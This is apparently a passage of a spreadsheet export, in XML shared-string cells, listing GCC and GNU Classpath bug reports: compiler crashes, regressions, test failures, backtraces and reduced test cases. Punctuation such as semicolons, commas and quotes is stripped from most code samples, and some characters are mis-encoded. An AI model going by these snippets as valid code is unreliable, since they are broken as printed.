&gt; gcc or_error.cpp
or_error.cpp:3: parse error before `or'
or_error.cpp: In function `int main (int char **)':
or_error.cpp:8: parse error before `or'
or_error.cpp:9: parse error before `or'
Release:
gcc version 2.96
Environment:
Redhat 7.2
How-To-Repeat:
compile the code</t>
  </si>
  <si>
    <t>taneem</t>
  </si>
  <si>
    <t>GCC-45361</t>
  </si>
  <si>
    <t>gcc.target/i386/volatile-2.c failed</t>
  </si>
  <si>
    <t>On Linux/x86-64. revision 163402 gave
FAIL: gcc.target/i386/volatile-2.c scan-assembler movl[ \\t]obj_5</t>
  </si>
  <si>
    <t>GCC-9928</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE on duplicate enum declaration</t>
  </si>
  <si>
    <t>gcc dies with a SEGV compiling the (invalid) code below:
$ ./cc1 x.c
x.c:2: error: conflicting types for `CODES'
x.c:1: error: previous declaration of `CODES'
x.c:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
Here's where it's dying:
Program received signal SIGSEGV Segmentation fault.
0x0839d43a in int_fits_type_p (c=0x0 type=0x4001e3cc) at ../../gcc/gcc/tree.c:4046
4046            return (! INT_CST_LT (TYPE_MAX_VALUE (type) c)
(gdb) where
#0  0x0839d43a in int_fits_type_p (c=0x0 type=0x4001e3cc) at ../../gcc/gcc/tree.c:4046
#1  0x08071a1b in finish_enum (enumtype=0x4004fd80 values=0x40038d48 attributes=0x0) at ../../gcc/gcc/c-decl.c:5564
#2  0x0804fe2b in yyparse () at c-parse.y:1692
#3  0x0805d145 in c_common_parse_file (set_yydebug=0) at ../../gcc/gcc/c-lex.c:165
During symbol reading struct/union type gets multiply defined: struct rtx_def.
During symbol reading struct/union type gets multiply defined: struct rtvec_def.
During symbol reading struct/union type gets multiply defined: struct function.
#4  0x08386db5 in compile_file () at ../../gcc/gcc/toplev.c:2187
#5  0x0838d9d7 in do_compile (no_backend=0) at ../../gcc/gcc/toplev.c:5517
#6  0x0838da56 in toplev_main (argc=2 argv=0xbfffc0a4) at ../../gcc/gcc/toplev.c:5557
#7  0x080cee6c in main (argc=2 argv=0xbfffc0a4) at ../../gcc/gcc/main.c:37
Release:
3.4 20030303 (experimental)
Environment:
System: Linux karma 2.4.19-emp_2419p5a829i #1 Tue Sep 3 17:42:17 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long : (reconfigured)
How-To-Repeat:
--------------------------------------------------
enum { CODES }
enum { CODES }
--------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-33680</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE when compilling elbg.c from ffmpeg (vectorizer)</t>
  </si>
  <si>
    <t>Looks like ffmpeg should be added to gcc testsuite. Just another ICE :
[/packages/mplayer/libavcodec]&gt; cc -I../libswscale -I../libavcodec  -DHAVE_AV_CONFIG_H -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -D_ISOC9X_SOURCE -I.. -I.. -I../libavutil -Wdisabled-optimization -Wno-pointer-sign -Wdeclaration-after-statement -I. -I.. -I../libavutil -Wall -Wno-switch -Wpointer-arith -Wredundant-decls -O4 -march=native -mtune=native -pipe -ffast-math -fomit-frame-pointer -D_REENTRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE64_SOURCE -DHAVE_CONFIG_H -I/usr/include/  -I/usr/include/SDL  -D_REENTRANT  -I/usr/include/freetype2 -I/usr/include  -c -o elbg.o elbg.c
elbg.c: In function 'try_shift_candidate':
elbg.c:245: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=/usr/lib/gcc-snapshot --disable-libgcj --disable-libssp --disable-nls --disable-werror --disable-checking --enable-clocale=gnu --enable-__cxa_atexit --enable-languages=cc++fortranobjc --enable-libstdcxx-allocator=new --enable-shared --enable-ssp --enable-threads=posix --enable-version-specific-runtime-libs --without-included-gettext --without-system-libunwind --with-system-zlib
Thread model: posix
gcc version 4.3.0 20071005 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-55734</t>
  </si>
  <si>
    <t>[4.8 Regression] gcov-io.c uses builtins not available in non-GCC compilers</t>
  </si>
  <si>
    <t>gcov-io.c uses the following builtins that are not available in non-GCC compilers or in older GCC's (pre 3.4):
__builtin_popcountll
__builtin_clzll</t>
  </si>
  <si>
    <t>GCC-81568</t>
  </si>
  <si>
    <t>attribute always_inline honored even after attribute noinline</t>
  </si>
  <si>
    <t>GCC detects and warns about the obviously nonsensical combination of attribute always_inline and noinline on the same function.  That's good so far as it goes but there are a couple of minor problems with how GCC treats this situation:
When the conflicting attributes appear on distinct declarations of the same function (the more likely case of the problem) it doesn't indicate which of the two GCC accepts.  When the conflicting attributes appear the same declaration of a function the warning makes it clear that it's the second of the two attributes that's ignored.  Based on this one would expect the same to be true in the first case (distinct declarations) but as it turns out (and as the test case below shows) that doesn't appear to be the case. 
$ cat x.c &amp;&amp; gcc -O2 -S -Wall -Wextra -Wpedantic -o/dev/stdout x.c
int __attribute__ ((noinline)) f (int)
int __attribute__ ((always_inline)) f (int)
int f (int i) { return i &gt; 1 ? i * f (i - 1) * f (i - 2) : i &gt; 0 ? i * f (i - 1) : 1 }
int f1 (void)
{
  return f (123)
}
int __attribute__ ((always_inline noinline)) g (int)
	.file	x.c
x.c:2:37: warning: declaration of â€˜fâ€™ with attribute â€˜always_inlineâ€™ follows declaration with attribute â€˜noinlineâ€™ [-Wattributes]
 int __attribute__ ((always_inline)) f (int)
                                     ^
x.c:1:32: note: previous declaration of â€˜fâ€™ was here
 int __attribute__ ((noinline)) f (int)
                                ^
x.c:11:1: warning: â€˜noinlineâ€™ attribute ignored due to conflict with attribute â€˜always_inlineâ€™ [-Wattributes]
 int __attribute__ ((always_inline noinline)) g (int)
 ^~~
x.c: In function â€˜f1â€™:
x.c:4:5: error: inlining failed in call to always_inline â€˜fâ€™: function not inlinable
 int f (int i) { return i &gt; 1 ? i * f (i - 1) * f (i - 2) : i &gt; 0 ? i * f (i - 1) : 1 }
     ^
x.c:8:10: note: called from here
   return f (123)
          ^~~~~~~</t>
  </si>
  <si>
    <t>GCC-60067</t>
  </si>
  <si>
    <t>bogus error default template arguments may not be used in function templates</t>
  </si>
  <si>
    <t>GCC 4.8.2 issues the bogus error below on the following valid C++ '98 program. Instantiating C (or the whole definition of foo) isn't necessary to trigger the error.
$ cat u.cpp &amp;&amp; g++ -c -o/dev/null u.cpp
template  struct A
template  struct B { enum { v = 1 }  }
template )&gt;
struct C {
  void f () {
    void g (int [B::v])
  }
}
void foo (void) {
    C().f ()
}
u.cpp: In member function â€˜void C::f()â€™:
u.cpp:7:26: error: default template arguments may not be used in function templates without -std=c++11 or -std=gnu++11
     void g (int [B::v])
                          ^</t>
  </si>
  <si>
    <t>CLASSPATH-23009</t>
  </si>
  <si>
    <t>swing: ActionEvent.actionCommand=null for JMenuItem</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Compile and run the attached testcase.
2. Choose File-&gt;Exit
Expected results:
1. A window with File menu shows up.
2. Program prints out actionPerformedactionCommand=Exit
Actual results:
1. A window with File menu shows up.
2. Program prints out actionPerformedactionCommand=null
Testcase:
import javax.swing.*
import java.awt.*
import java.awt.event.*
public class testcase extends JFrame implements ActionListener {
        public static void main(String[] args)  {
                new testcase().show()
        }
        public testcase() {
                JMenuItem exit = new JMenuItem(Exit)
                exit.addActionListener(this)
                JMenu file = new JMenu(File)
                file.add(exit)
                JMenuBar bar = new JMenuBar()
                bar.add(file)
                this.setJMenuBar(bar)
                this.setSize(new Dimension(400 400))
        }
        public void actionPerformed(ActionEvent e) {
               System.out.println(actionPerformedactionCommand=
                                   + e.getActionCommand())
        }
}
</t>
  </si>
  <si>
    <t>CLASSPATH-17254</t>
  </si>
  <si>
    <t>[java-gui-branch] Hang when resizing AWT window on Alpha</t>
  </si>
  <si>
    <t>Hi
If I start the libjava/gnu/java/awt/peer/gtk/TestAWT.java program:
gcj -v TestAWT.java --main=TestAWT &amp;&amp; ./a.out
Reading specs from /tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/specs
Reading specs from
/tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/../../../libgcj.spec
rename spec lib to liborig
Configured with: ../configure --enable-languages=java --enable-java-gc=boehm
--enable-java-awt=gtk : (reconfigured) ../configure --enable-languages=java
--enable-java-gc=boehm --enable-java-awt=gtk
Thread model: posix
gcc version 3.5.0 20040619 (experimental)
 /tmp/bla/bin/../libexec/gcc/alphaev68-unknown-linux-gnu/3.5.0/jc1 TestAWT.java
-fhash-synchronization -fuse-divide-subroutine -fuse-boehm-gc
-fnon-call-exceptions -mieee -fkeep-inline-functions -quiet -dumpbase
TestAWT.java -mcpu=ev67 -auxbase TestAWT -g1 -version -o /tmp/ccPhS7oa.s
GNU Java version 3.5.0 20040619 (experimental) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 3.5.0 20040619 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Class path starts here:
    ./
    /tmp/bla/bin/../lib/gcc/../../share/java/libgcj-3.5.0.jar/ (system) (zip)
 as -no-mdebug -o /tmp/cch6IF42.o /tmp/ccPhS7oa.s
 /tmp/bla/bin/../libexec/gcc/alphaev68-unknown-linux-gnu/3.5.0/jvgenmain
TestAWTmain /tmp/ccFYEys5.i
 /tmp/bla/bin/../libexec/gcc/alphaev68-unknown-linux-gnu/3.5.0/cc1
/tmp/ccFYEys5.i -quiet -dumpbase TestAWTmain.c -mcpu=ev67 -g1 -version
-fdollars-in-identifiers -o /tmp/ccPhS7oa.s
GNU C version 3.5.0 20040619 (experimental) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 3.5.0 20040619 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -no-mdebug -o /tmp/ccZwLRCc.o /tmp/ccPhS7oa.s
 /tmp/bla/bin/../libexec/gcc/alphaev68-unknown-linux-gnu/3.5.0/collect2
--eh-frame-hdr -m elf64alpha -O1 -dynamic-linker /lib/ld-linux.so.2
/usr/lib/crt1.o /usr/lib/crti.o
/tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/crtbegin.o
-L/tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0
-L/tmp/bla/bin/../lib/gcc -L/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/3.5.0
-L/tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/../../..
-L/usr/local/lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/../../.. /tmp/ccZwLRCc.o
/tmp/cch6IF42.o -lgcc_s -lgcc -l-java-awt -l-java-applet -l-java-beans
-l-javax-accessibility -l-javax-swing -lgcj -l-java-util-logging -lm -lpthread
-ldl -lgcc_s -lgcc -lc -lgcc_s -lgcc
/tmp/bla/bin/../lib/gcc/alphaev68-unknown-linux-gnu/3.5.0/crtend.o /usr/lib/crtn.o
I get a nice window. If I then resize it quickly with a window manager with
solid resize the program hangs and doesn't do any redraws any more.
I'll attach the output of the program when DEBUG_LOCKING is enabled.</t>
  </si>
  <si>
    <t>GCC-82016</t>
  </si>
  <si>
    <t>[8 regression] test case gcc.target/powerpc/float128-type-1.c fails after r251260</t>
  </si>
  <si>
    <t>r251260 is the change to wide-int.h but this test case failure is different from the others that change caused.
The test case states:
/* This test tests whether -mfloat128-type (which enables the underlying IEEE
   128-bit floating point) is enabled by default on VSX Linux 64-bit systems
   even if the keywords __float128 and _Float128 (-mfloat128) are not enabled
   via the -mfloat128 switch.  Test that power8 generates a call to the
   __addkf3 emulation function.  */
and after the wide-int.h change the call to __addkf3 is missing.
seurer@genoa:~/gcc/build/gcc-test$ diff float128-type-1.s.r251259 float128-type-1.s.r251260
3d2
&lt; 	.globl __addkf3
1021c9
&lt; .LCF0:
&lt; 0:	addis 212.TOC.-.LCF0@ha
&lt; 	addi 22.TOC.-.LCF0@l
&lt; 	.localentry	add_scalar.-add_scalar
&lt; 	mflr 0
&lt; 	std 016(1)
&lt; 	stdu 1-32(1)
&lt; 	bl __addkf3
&lt; 	nop
&lt; 	addi 1132
&lt; 	ld 016(1)
&lt; 	mtlr 0
---
&gt; 	vspltisw 20
24c12
&lt; 	.byte 0001128000
---
&gt; 	.byte 00000000
3165c1921
&lt; .LCF1:
&lt; 0:	addis 212.TOC.-.LCF1@ha
&lt; 	addi 22.TOC.-.LCF1@l
&lt; 	.localentry	add_complex.-add_complex
&lt; 	mflr 0
&lt; 	std 016(1)
&lt; 	stdu 1-80(1)
&lt; 	li 032
&lt; 	stvx 2910
&lt; 	li 048
&lt; 	xxlor 613737
&lt; 	stvx 3010
&lt; 	li 064
&lt; 	xxlor 623535
&lt; 	xxlor 353636
&lt; 	stvx 3110
&lt; 	bl __addkf3
&lt; 	nop
&lt; 	xxlor 356161
&lt; 	xxlor 633434
&lt; 	xxlor 346262
&lt; 	bl __addkf3
&lt; 	nop
&lt; 	addi 1180
&lt; 	li 0-48
&lt; 	lvx 2910
&lt; 	li 0-32
&lt; 	xxlor 03434
&lt; 	xxlor 346363
&lt; 	lvx 3010
&lt; 	li 0-16
&lt; 	xxlor 3500
&lt; 	lvx 3110
&lt; 	ld 016(1)
&lt; 	mtlr 0
---
&gt; 	vspltisw 00
&gt; 	xxlor 343232
&gt; 	xxlor 353232
68c24
&lt; 	.byte 0001128000
---
&gt; 	.byte 00000000
70c26
&lt; 	.ident	GCC: (GNU) 8.0.0 20170822 (experimental) [trunk revision 251259]
---
&gt; 	.ident	GCC: (GNU) 8.0.0 20170822 (experimental) [trunk revision 251260]</t>
  </si>
  <si>
    <t>GCC-65107</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/eof_4.f90 runtime error: File 'test.dat' already exists</t>
  </si>
  <si>
    <t>failure in gfortran.sum:
...
FAIL: gfortran.dg/eof_4.f90   -O0  execution test
FAIL: gfortran.dg/eof_4.f90   -O1  execution test
FAIL: gfortran.dg/eof_4.f90   -O2  execution test
FAIL: gfortran.dg/eof_4.f90   -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/eof_4.f90   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/eof_4.f90   -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/eof_4.f90   -O3 -g  execution test
FAIL: gfortran.dg/eof_4.f90   -Os  execution test
...
In more detail:
...
At line 12 of file src/gcc/testsuite/gfortran.dg/eof_4.f90 (unit = 99)
Fortran runtime error: File 'test.dat' already exists
FAIL: gfortran.dg/eof_4.f90   -O0  execution test
...
Probably observed earlier here: PR64770 comment 0.
The nature of the failure is that the test expects test.dat not to exist but it does.
The test itself does not clean up after itself so it's missing:
...
! { dg-final { remote_file build delete test.dat } }
...
But cleaning after itself does not guarantee that this failure is fixed. We need to ensure that all tests that use test.dat clean up after themselves.</t>
  </si>
  <si>
    <t>GCC-36671</t>
  </si>
  <si>
    <t>[4.4 Regression]: gfortran.dg/associated_1.f90</t>
  </si>
  <si>
    <t>Revision 137252:
http://gcc.gnu.org/ml/gcc-patches/2008-06/msg01883.html
caused
FAIL: gfortran.dg/associated_1.f90  -O1  execution test</t>
  </si>
  <si>
    <t>GCC-22508</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE after invalid operator new</t>
  </si>
  <si>
    <t>The command below results in internal compiler error: Segmentation fault with the checking-
enabled version of GCC 4.0.1 on Suse Linux 9.2.  It also crashes with Apple GCC 4.0.0 on Mac OSX 
10.4.2.  
    GCC 3.3.4 on Suse rejects the code without crashing as does CodeSourcery arm-none-linux-
gnueabi-g++ 3.4.3 our local version of arm-softfloat-linux-gnu 3.4.1 and (on OSX) Apple's GCC 3.3 
and my own build of 3.4.0.
/opt/gcc401chk/bin/g++     -c       ../cpp/bugfiles/error/EckelRob_104822.ii 
../jammed/Barney/eckel.cpp: In function â€˜std::string EckelCode::FramisTest()â€™:
../jammed/Barney/eckel.cpp:2039: internal compiler error: Segmentation fault
    With the Apple version of GCC 4.0.0 it gives a crash dialog (with a Reportâ€¦ button which doesn't 
work) with the following text:
The application cc1plus quit unexpectedlyâ€¦
EXC_BAD_ACCESS (0x1)
KERN_PROTECTION_FAILURE (0X2) at 0xc
Thread 0 Crashed:
0 0x1000 + 457016
â€¦
    I'll attach the preprocessed source.  It was copied by Rob Stevenson a former PalmSource employee 
from volume one of Bruce Eckel's _Thinking in C++_.  Here's the relevant function:
string FramisTest() {
   	stringstream ss2
  Framis* f[Framis::psize]
  try {
    for(int i = 0 i &lt; Framis::psize i++)
      f[i] = new Framis
    new Framis // Out of memory
  } catch(bad_alloc) {
    ss2 &lt;&lt; Out of memory! &lt;&lt; endl
  }
  delete f[10]
  f[10] = 0
  // Use released memory:
  Framis* x = new Framis
  delete x
  for(int j = 0 j &lt; Framis::psize j++)	{
  	ss2 ReturnStrStream() 
    delete f[j] // Delete f[10] OK
   }
  return ss2.str() 
} ///:~
______________________________________
Configurations:
Suse:
62&gt; /opt/gcc401chk/bin/g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-checking --prefix=/opt/gcc401chk --enable-languages=cc+
+
Thread model: posix
gcc version 4.0.1
63&gt; uname -a
Linux thrallis 2.6.8-24.16-default #1 Thu Jun 2 12:09:57 UTC 2005 i686 i686 i386 GNU/Linux
Macintosh:
&gt; gcc -v
Reading specs from /usr/lib/gcc/powerpc-apple-darwin8/4.0.0/specs
Configured with: /private/var/tmp/gcc/gcc-4061.obj~8/src/configure --disable-checking --prefix=/
usr --mandir=/share/man --enable-languages=cobjcc++obj-c++ --program-transform-name=/^
[cg][^+.-]*$/s/$/-4.0/ --with-gxx-include-dir=/include/gcc/darwin/4.0/c++ --build=powerpc-
apple-darwin8 --host=powerpc-apple-darwin8 --target=powerpc-apple-darwin8
Thread model: posix
gcc version 4.0.0 20041026 (Apple Computer Inc. build 4061)
112&gt; uname -a
Darwin klono.local 8.2.0 Darwin Kernel Version 8.2.0: Fri Jun 24 17:46:54 PDT 2005 
root:xnu-792.2.4.obj~3/RELEASE_PPC Power Macintosh powerpc
PalmSource bug #104822
---
Flash Sheridan
http://pobox.com/~flash
Quality Lead for Compilers and Debuggers
PalmSource Inc. Tools Quality Management</t>
  </si>
  <si>
    <t>GCC-38477</t>
  </si>
  <si>
    <t>[strict-aliasing] warning message contains compiler-generated symbols</t>
  </si>
  <si>
    <t>[root@localhost gcc_err]# g++ -Wall -c -O3 test.cpp
test.cpp: In member function 'void
test::bar(std::_List_iterator &gt;&amp;)':
test.cpp:14: warning: dereferencing pointer '__x.13' does break
strict-aliasing rules
/usr/local/gcc_current/lib/gcc/i686-pc-linux-gnu/4.4.0/include/c++/bits/stl_tree.h:530:
note: initialized from here
test.cpp:14: warning: dereferencing pointer '__x.13' does break
strict-aliasing rules
/usr/local/gcc_current/lib/gcc/i686-pc-linux-gnu/4.4.0/include/c++/bits/stl_tree.h:530:
note: initialized from here
[root@localhost gcc_err]# g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++ :
(reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion : (reconfigured) ../gcc_current/configure
--prefix=/usr/local/gcc_current --enable-shared --enable-threads=posix
--enable-checking=release --enable-__cxa_atexit
--enable-version-specific-runtime-libs --enable-languages=cc++
--no-create --no-recursion
Thread model: posix
gcc version 4.4.0 20081210 (experimental) [trunk revision 142645] (GCC)
[root@localhost gcc_err]# uname -a
Linux localhost.localdomain 2.6.26.6-49.fc8 #1 SMP Fri Oct 17 15:59:36
EDT 2008 i686 i686 i386 GNU/Linux
[root@localhost gcc_err]# cat test.cpp
#include 
#include 
template
class KeyPairPtr
{
public:
   typedef typename std::pair Pair
   Pair *pair_ptr
}
template
bool operator  &amp;left const
KeyPairPtr &amp;right ) {
   return left.pair_ptr &lt; right.pair_ptr
}
typedef KeyPairPtr key_val
class test
{
   test()
   void bar( std::list::iterator 
   std::set foo
}
void test::bar( std::list::iterator &amp;ci )
{
   test ctx
   ctx.foo.insert( *ci )
}</t>
  </si>
  <si>
    <t>GCC-53885</t>
  </si>
  <si>
    <t>seg. fault during assignment to allocatable component within type-bounded proc.</t>
  </si>
  <si>
    <t>Assignment within the type-bounded procedure to an UN-allocated component causes seg. fault.
It seems according to 7.2.1.2 &amp; 7.2.1.3 of f2008 standard the assignment to unallocated item of intrinsic type should be valid.
Such assignment works if not within a type-bounded procedure.
The attached is a reduced example.</t>
  </si>
  <si>
    <t>wangmianzhi1</t>
  </si>
  <si>
    <t>GCC-60515</t>
  </si>
  <si>
    <t>Compiler crash with -g and -mpoke-function-name option combined</t>
  </si>
  <si>
    <t>When building XZ 5.0 decoder GCC pre-4.9.0 crashes with two distinct files (out of a project with hundreds of files compiled with the very same command line option).
The error is:
  $ /usr/local/opt/arm-eabi-gcc49/bin/arm-eabi-gcc-4.9.0 -mcpu=arm7tdmi-s -g  -mpoke-function-name -o demo.o -c demo.c
  demo.c: In function â€˜xz_dec_endâ€™:
  demo.c:19:1: internal compiler error: in dwarf2out_frame_debug_adjust_cfa at dwarf2cfi.c:1090
   }
   ^
  demo.c:19:1: internal compiler error: Abort trap: 6
  arm-eabi-gcc-4.9.0: internal compiler error: Abort trap: 6 (program cc1)
  Abort trap: 6
GCC version:
  $ arm-eabi-gcc-4.9.0 --version
  arm-eabi-gcc-4.9.0 (SDK2-Legolas) 4.9.0 20140309 (experimental)
  Copyright (C) 2014 Free Software Foundation Inc.
  This is free software see the source for copying conditions.  There is NO
  warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  Note: It is an EABI target not the GNUEABI version.
  It has been built an executed on OS X 10.9.2 with GCC 4.8 [gcc-4.8 (GCC) 4.8.2] 
  with newlib 2.0.0 as the target libraries (./newlib and ./libgloss)
  and binutils 2.24 for the target binutils.
Configure command line:
   ../configure --prefix=${prefix}
                --target=arm-eabi
                --disable-shared
                --with-gnu-as
                --with-gnu-ld
                --with-newlib
                --enable-softfloat
                --disable-bigendian
                --disable-fpu
                --disable-underscore
                --enable-multilibs
                --with-float=soft
                --enable-interwork
                --enable-lto
                --with-multilib
                --with-abi=aapcs
                --enable-languages=cc++
                --with-gmp=${gmp_prefix}
                --with-mpfr=${mpfr_prefix}
                --with-mpc=${libmpc_prefix}
                --with-cloog=${cloog_prefix}
                --enable-cloog-backend=isl
                --with-isl=${isl_prefix}
                --with-libelf=${libelf_prefix}
                --with-gxx-include-dir=${prefix}/arm-eabi/include
                --disable-debug
                --disable-__cxa_atexit
I've shrunk the content of the source file that triggers the bug to the minimal
possible size.
I also removed all the command line options to the simplest possible options.
demo.c:
  struct xz_dec_lzma2
  struct xz_dec_bcj
  struct xz_dec 
  {
      struct xz_dec_lzma2 *lzma2
      struct xz_dec_bcj *bcj
  }
  void xz_dec_end(struct xz_dec *s)
  void xz_dec_lzma2_end(struct xz_dec_lzma2 *s)
  void free(void * p)
  void xz_dec_end(struct xz_dec *s)
  {
      xz_dec_lzma2_end(s-&gt;lzma2)
      free(s-&gt;bcj)
  }
command line triggering the crash:
  arm-eabi-gcc-4.9.0 -mcpu=arm7tdmi-s -g -mpoke-function-name -o demo.o -c demo.c
removing -g OR -mpoke-function-name builds the output file Ok no crash.
Let me know if you need any other piece of information.</t>
  </si>
  <si>
    <t>eblot.ml</t>
  </si>
  <si>
    <t>GCC-78705</t>
  </si>
  <si>
    <t>ICE in ix86_test_dumping_memory_blockage</t>
  </si>
  <si>
    <t>gmake[3]: Entering directory '/mnt/kargl/obj/gcc'
/mnt/kargl/obj/./gcc/xgcc -B/mnt/kargl/obj/./gcc/ -nostdinc -x c /dev/null -S -fself-test -o /dev/null
/mnt/kargl/gcc/gcc/config/i386/i386.c:51198: ix86_test_dumping_memory_blockage: FAIL: ASSERT_STREQ (expected_dump dump) expected=(cinsn 1 (set (mem/v:BLK (0|scratch:DI) [0  A8])
        (unspec:BLK [
                (mem/v:BLK (reuse_rtx 0) [0  A8])
            ] UNSPEC_MEMORY_BLOCKAGE)))
 actual=(cinsn 1 (set (mem/v:BLK (0|scratch:SI) [0  A8])
        (unspec:BLK [
                (mem/v:BLK (reuse_rtx 0) [0  A8])
            ] UNSPEC_MEMORY_BLOCKAGE)))
cc1: internal compiler error: in fail_formatted at selftest.c:62
no stack trace because unwind library not available
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-6814</t>
  </si>
  <si>
    <t>Error in include file file_basic.h when expanding template</t>
  </si>
  <si>
    <t>When compiling arts version 1.0.1 the compiler will stop at line 52 in 
the file file_basic.h while expanding __c_basic_file class definition
Release:
gcc-3.1 15-05-2002
Environment:
Linux v2.4.17 i686 X3.x
How-To-Repeat:
compile arts-1.0.1</t>
  </si>
  <si>
    <t>ger</t>
  </si>
  <si>
    <t>GCC-20493</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Bootstrap failure because of aliased symbols</t>
  </si>
  <si>
    <t>stage1/xgcc -Bstage1/ -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/bin/ -c   -g
 -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototype
s -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Werror -
fno-common   -DHAVE_CONFIG_H -DGENERATOR_FILE    -I. -Ibuild -I../../gcc/gcc -I.
./../gcc/gcc/build -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include
 \
 -o build/errors.o ../../gcc/gcc/errors.c
stage1/xgcc -Bstage1/ -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/bin/   -g -O
2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -
pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Werror -fno
-common   -DHAVE_CONFIG_H -DGENERATOR_FILE  -o build/genmodes \
 build/genmodes.o build/errors.o ../build-hppa-linux/libiberty/libiberty.a
build/genmodes -h &gt; tmp-modes.h
make[2]: *** [s-modes] Error 139
(gdb) r -h &gt; tmp-modes.h
Starting program: /home/dave/gnu/gcc-4.0/objdir/gcc/build/genmodes -h &gt; tmp-
modes.h
Program received signal SIGSEGV Segmentation fault.
0x00013c68 in __canonicalize_funcptr_for_compare (fptr=@0xffffffff: 0)
    at fptr.c:61
61      {
(gdb) disass __canonicalize_funcptr_for_compare
Dump of assembler code for function __canonicalize_funcptr_for_compare:
0x00013c64 :      stw rp-14(sp)
0x00013c68 :      stwma r680(sp)
0x00013c6c :      ldi 0r6
0x00013c70 :     stw r5-7c(sp)
0x00013c74 :     stw r4-78(sp)
0x00013c78 :     copy r19r4
0x00013c7c :     stw r3-74(sp)
0x00013c80 :     copy r26r3
0x00013c84 :     bl 0x13c64 &lt;
__canonicalize_funcptr_for_compare&gt;rp
0x00013c88 :     stw r19-20(sp)
0x00013c8c :     copy r4r19
0x00013c90 :     copy ret0r5
0x00013c94 :     bl 0x13c64 &lt;
__canonicalize_funcptr_for_compare&gt;rp
0x00013c98 :     ldi -1r26
The function is miscompiled completely.  It calls itself recursively
until stack allocation fails.</t>
  </si>
  <si>
    <t>GCC-28545</t>
  </si>
  <si>
    <t>[4.1 Regression] Wrong code for hoisted multiplication</t>
  </si>
  <si>
    <t>I have some code that calls
